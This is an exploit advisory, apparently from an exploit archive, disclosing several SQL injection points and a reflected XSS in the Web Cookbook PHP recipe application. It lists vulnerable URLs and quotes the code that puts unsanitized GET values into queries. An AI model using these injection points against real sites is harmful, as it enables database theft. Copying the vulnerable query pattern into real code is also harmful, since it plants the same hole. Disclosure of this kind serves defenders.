74 lines
2.2 KiB
Text
Executable file
74 lines
2.2 KiB
Text
Executable file
# Exploit Title: Web Cookbook Multiple SQL Injection
|
|
# Date: 2013/3/12
|
|
# Exploit Author: Saadat Ullah ? saadi_linux@rocketmail.com
|
|
# Software Link: http://sourceforge.net/projects/webcookbook/
|
|
# Author HomePage: http://security-geeks.blogspot.com/
|
|
# Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3
|
|
|
|
# SQL Injection
|
|
|
|
http://localhost/cook/searchrecipe.php?sstring=[SQLi]
|
|
http://localhost/cook/showtext.php?mode=[SQLi]
|
|
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
|
|
|
|
|
|
http://localhost/cook/showtext.php?mode=[SQLi]
|
|
#Proof Of Concept
|
|
In showtext.php
|
|
Code:
|
|
$mode = $_GET["mode"];
|
|
.
|
|
.
|
|
showText($mode, $art);//sending $mode to a function without sanitizing it
|
|
.
|
|
.
|
|
function showText($kategorie, $art) {
|
|
initDB();
|
|
echo "<div class=\"rdisplay\">\n";
|
|
$query = "SELECT * FROM dat_texte WHERE id = $kategorie"; //using a non sanitize field in the querry
|
|
$result = mysql_query($query);
|
|
.
|
|
.
|
|
All GET Fields Are Vuln To SQLi
|
|
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
|
|
#p0c
|
|
In searchrecipe.php
|
|
$title = $_GET['title'];
|
|
$prefix = $_GET['prefix'];
|
|
$preparation = $_GET['preparation'];
|
|
$postfix = $_GET['postfix'];
|
|
$tipp = $_GET['tipp'];
|
|
$ingredient = $_GET['ingredient'];
|
|
.
|
|
.
|
|
.
|
|
if ($title != "") {
|
|
$sstring = "a.title LIKE '%$title%' ";
|
|
}
|
|
.
|
|
.
|
|
searchRecipe($mode, $sstring);
|
|
.
|
|
.
|
|
In Function SearchRecipe
|
|
$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";
|
|
|
|
|
|
http://localhost/cook/searchrecipe.php?sstring=[SQLi]
|
|
P0c
|
|
$sstring = $_GET['sstring'];
|
|
if ($sstring != "") {
|
|
searchRecipe(0, $sstring);
|
|
.
|
|
.
|
|
.
|
|
$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";
|
|
|
|
|
|
A simple Non-Presistent XSS
|
|
http://localhost/cook/searchrecipe.php?mode=1&title=<script>alert('hi');</script>&prefix=&preparation=&postfix=&tipp=&ingredient=
|
|
|
|
|
|
#Independent Pakistani Security Researcher
|
|
|
|
|